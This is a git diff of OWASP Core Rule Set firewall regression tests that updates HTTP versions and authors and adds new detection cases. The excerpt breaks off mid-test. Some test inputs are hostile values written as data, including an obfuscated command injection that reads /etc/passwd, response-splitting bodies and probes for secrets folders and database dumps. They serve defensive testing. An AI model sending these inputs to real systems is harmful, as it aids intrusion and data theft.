-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
+            {{ "1" | repeat 64200 }}
             ----------111111111--
           version: "HTTP/1.1"
         output:
@@ -876,9 +44,7 @@ tests:
             ----------111111
             Content-Disposition: form-data; name="smallfile"; filename="file.txt"
             Content-Type: text/plain
-
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
-            1111111111111111111111111111111111111111111111111111111111111111111111111111
+            {{ "1" | repeat 152 }}
             ----------111111--
           version: "HTTP/1.1"
         output:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
index be0c56158..416a7774f 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "csanders-git, Franziska Bühler, azurit"
+  author: "csanders-git, Franziska Bühler, azurit, Andrew Howe"
 rule_id: 920420
 tests:
   - test_id: 1
@@ -248,6 +248,7 @@ tests:
           log:
             expect_ids: [920420]
   - test_id: 12
+    desc: "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -263,8 +264,9 @@ tests:
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [920420]
+            expect_ids: [920420]
   - test_id: 13
+    desc: "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -280,7 +282,7 @@ tests:
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [920420]
+            expect_ids: [920420]
   - test_id: 14
     stages:
       - input:
@@ -311,7 +313,7 @@ tests:
           method: GET
           port: 80
           uri: "/"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
         output:
           log:
@@ -329,7 +331,7 @@ tests:
           method: GET
           port: 80
           uri: "/"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
         output:
           log:
@@ -347,8 +349,62 @@ tests:
           method: GET
           port: 80
           uri: "/"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
         output:
           log:
             expect_ids: [920420]
+  - test_id: 18
+    desc: "Positive test: Ensure that the content type multipart/related is not allowed by the default configuration (ref.: 9EA-241022)"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Content-Type: multipart/related
+          method: POST
+          port: 80
+          uri: "/"
+          data: "foo"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [920420]
+  - test_id: 19
+    desc: "Positive test: Ensure that the content type application/cloudevents+json is not allowed by the default configuration (ref.: 9EA-241022)"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Content-Type: application/cloudevents+json
+          method: POST
+          port: 80
+          uri: "/"
+          data: '{"foo":"bar"}'
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [920420]
+  - test_id: 20
+    desc: "Positive test: Ensure that the content type application/cloudevents-batch+json is not allowed by the default configuration (ref.: 9EA-241022)"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Content-Type: application/cloudevents-batch+json
+          method: POST
+          port: 80
+          uri: "/"
+          data: '{"foo":"bar"}'
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [920420]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
index 1f09ea7fb..fc0a86d14 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
@@ -22,7 +22,7 @@ tests:
       - input:
           dest_addr: "127.0.0.1"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
index 44275bba6..a1d6a49ad 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
@@ -143,3 +143,25 @@ tests:
         output:
           log:
             expect_ids: [920440]
+  - test_id: 8
+    desc: |
+      False Positive:
+      Don't block font files
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Accept-Encoding: gzip,deflate
+            Accept-Language: en-us,en;q=0.5
+            Host: localhost
+            Keep-Alive: "300"
+            Proxy-Connection: keep-alive
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get/wp-content/plugins/wp-dark-mode/assets/fonts/Inter.ttf"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [920440]
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
index 6a68b4dfa..1a349d228 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
@@ -205,23 +205,6 @@ tests:
           log:
             expect_ids: [920470]
   - test_id: 13
-    stages:
-      - input:
-          dest_addr: 127.0.0.1
-          port: 80
-          method: POST
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Content-Type: 'multipart/related; type="application/xop+xml"; boundary="uuid:a111aaa1-aa11-1a11-a11a-11a1111aa11a"; start="<root.message@cxf.apache.org>"; start-info="application/soap+xml'
-            Content-Length: 0
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/"
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [920470]
-  - test_id: 14
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -238,7 +221,7 @@ tests:
         output:
           log:
             no_expect_ids: [920470]
-  - test_id: 15
+  - test_id: 14
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -255,7 +238,7 @@ tests:
         output:
           log:
             no_expect_ids: [920470]
-  - test_id: 16
+  - test_id: 15
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -272,7 +255,7 @@ tests:
         output:
           log:
             no_expect_ids: [920470]
-  - test_id: 17
+  - test_id: 16
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -289,7 +272,7 @@ tests:
         output:
           log:
             no_expect_ids: [920470]
-  - test_id: 18
+  - test_id: 17
     desc: "Status Page Test - Illegal Content-Type header: 'text/xml; blah' where blah isn't a valid parameter for this header field"
     stages:
       - input:
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
index f023b6a35..0171b7d90 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
@@ -16,8 +16,8 @@ tests:
           method: POST
           port: 80
           uri: "/"
-          data: "var=%0aPOST / HTTP/1.0"
-          version: HTTP/1.0
+          data: "var=%0aPOST / HTTP/1.1"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [921110]
@@ -35,7 +35,7 @@ tests:
           port: 80
           uri: "/"
           data: "var=aaa%0aGET+/+HTTP/1.1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [921110]
@@ -53,12 +53,12 @@ tests:
           port: 80
           uri: "/"
           data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [921110]
   - test_id: 4
-    desc: "HTTP Response Splitting - pre-HTTP/1.0"
+    desc: "HTTP Response Splitting - pre-HTTP/1.1"
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -71,7 +71,7 @@ tests:
           port: 80
           uri: "/"
           data: "var=aaa%0d%0aGet+/foo%0d"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [921110]
@@ -89,7 +89,7 @@ tests:
           port: 80
           uri: "/"
           data: "var=aaa%0d%0aGet+foo+bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [921110]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
index 224232ba5..dfe17ca8f 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
@@ -19,6 +19,7 @@ tests:
           uri: "/"
           version: "HTTP/1.1"
         output:
+          status: 400
           log:
             no_expect_ids: [921140]
   - test_id: 2
@@ -37,4 +38,4 @@ tests:
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [921140]
+            expect_ids: [921140]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
index 9a57c4427..a8f3a3bf0 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
@@ -32,7 +32,7 @@ tests:
             Accept: "*/*"
           method: GET
           uri: "/get?parameter%0d%0a=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [921150]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921250.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921250.yaml
new file mode 100644
index 000000000..17692ed58
--- /dev/null
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921250.yaml
@@ -0,0 +1,58 @@
+---
+meta:
+  author: "fzipi"
+  description: "Rule for preventing usage of deprecated V1 cookies from rfc 2109"
+rule_id: 921250
+tests:
+  - test_id: 1
+    desc: "Positive test: Detect if the cookie V1 is present in the request headers"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+            Origin: https://www.example.com
+            Referer: https://www.example.com/
+            Cookie: $Version=1; session=\"deadbeef; PHPSESSID=secret; dummy=qaz\"
+          port: 80
+          uri: "/"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [921250]
+  - test_id: 2
+    desc: "Positive test: Detect if cookie V1 and also quoting is trying to be abused in the request headers"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+            Origin: https://www.example.com
+            Referer: https://www.example.com/
+            Cookie: "$Version=1; session=\"deadbeef; PHPSESSID=secret; dummy=qaz\""
+          port: 80
+          uri: "/"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [921250]
+  - test_id: 3
+    desc: "Negative test: do not match if Version is used as part of a cookie name"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "*/*"
+            Cookie: MyVersion=1; PHPSESSID=secret
+          port: 80
+          uri: "/"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [921250]
diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922130.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922130.yaml
index c733fecba..4ac701890 100644
--- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922130.yaml
+++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922130.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Ervin Hegedus"
+  author: "Ervin Hegedus, TimDiam0nd"
   description: Test Multipart/form-data
 rule_id: 922130
 tests:
@@ -26,7 +26,7 @@ tests:
           log:
             # The rule will match when an older version of the engine doesn't fail parsing. In newer versions of the engine,
             # parsing will fail and the body will be considered invalid.
-            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 2
     desc: |
       Positive test: special character in multipart header.
@@ -49,7 +49,7 @@ tests:
           log:
             # The rule will match when an older version of the engine doesn't fail parsing. In newer versions of the engine,
             # parsing will fail and the body will be considered invalid.
-            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 3
     desc: "Negative test: no special character in multipart header"
     stages:
@@ -72,7 +72,7 @@ tests:
             --boundary--
         output:
           log:
-            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 4
     desc: |
       Positive test: special character in multipart header.
@@ -95,7 +95,7 @@ tests:
           log:
             # The rule will match when an older version of the engine doesn't fail parsing. In newer versions of the engine,
             # parsing will fail and the body will be considered invalid.
-            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 5
     desc: "Negative test: no character from outside of range in multipart header; '!' is allowed (\x21, the first character in the range of valid characters))"
     stages:
@@ -118,7 +118,7 @@ tests:
             --boundary--
         output:
           log:
-            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 6
     desc: "Negative test: no character from outside of range in multipart header; '~' is allowed (\x7E, the last valid character in the range of valid characters)"
     stages:
@@ -142,7 +142,7 @@ tests:
             --boundary--
         output:
           log:
-            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            no_match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
   - test_id: 7
     desc: |
       Positive test: special character in multipart header.
@@ -165,4 +165,27 @@ tests:
           log:
             # The rule will match when an older version of the engine doesn't fail parsing. In newer versions of the engine,
             # parsing will fail and the body will be considered invalid.
-            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\] \[msg "Multipart header contains characters outside of valid range"\]'
+            match_regex: 'Multipart parsing error: Multipart: Invalid part header \(contains invalid character\)|\[id "922130"\].*\[msg "Multipart header contains characters outside of valid range"\]'
+  - test_id: 8
+    desc: Negative test - do not match when there are no multipart headers.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Content-Type: multipart/form-data; boundary=boundary123
+            Accept: "*/*"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: "HTTP/1.1"
+          data: |
+            --boundary123
+            test
+            --boundary123
+            yet another test
+            --boundary123--
+        output:
+          log:
+            no_expect_ids: [922130]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
index 46ab1697e..2f0015a34 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "csanders-git, azurit"
+  author: "csanders-git, azurit, Esad Cetiner"
 rule_id: 930120
 tests:
   - test_id: 1
@@ -182,3 +182,75 @@ tests:
         output:
           log:
             no_expect_ids: [930120]
+  - test_id: 11
+    desc: |
+      False positive test.
+      Don't match `.env`
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?code=>/test.environment"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [930120]
+  - test_id: 12
+    desc: |
+      False positive test.
+      Don't match .dockery in email address (matching .docker)
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?code=firstname.dockery@host.tld"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [930120]
+  - test_id: 13
+    desc: |
+      True positive test.
+      Accessing hidden folder .docker
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?code=/path/to/.docker/secrets"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [930120]
+  - test_id: 14
+    desc: |
+      True positive test.
+      Accessing compressed database dump
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?code=backup.sql.zip"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [930120]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
index 821b89275..6c4d8d2af 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
@@ -213,3 +213,21 @@ tests:
         output:
           log:
             expect_ids: [930121]
+  - test_id: 11
+    desc: |
+      False positive test.
+      Don't match `.env`
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            User-Agent: "/test.environment"
+          uri: "/get"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [930121]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
index 30983314c..80eb80460 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Andrew Howe, azurit"
+  author: "Andrew Howe, azurit, Esad Cetiner"
 rule_id: 930130
 tests:
   - test_id: 1
@@ -35,3 +35,21 @@ tests:
         output:
           log:
             expect_ids: [930130]
+  - test_id: 3
+    desc: |
+      True positive test.
+      Accessing compressed database dump
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get/backup.sql.zip"
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [930130]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
index a4fb0ce80..797b541da 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "0xInfection"
+  author: "0xInfection, Franziska Bühler"
 rule_id: 932125
 tests:
   - test_id: 1
@@ -51,3 +51,54 @@ tests:
         output:
           log:
             expect_ids: [932125]
+  - test_id: 4
+    desc: "Test for fp issue with ;man x"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "POST"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: "payload=Ihre kleine Schwester ist französisches Esskulturgut; man gönnt sie sich."
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [932125]
+  - test_id: 5
+    desc: "Test for fp issue with ;mi x"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "POST"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
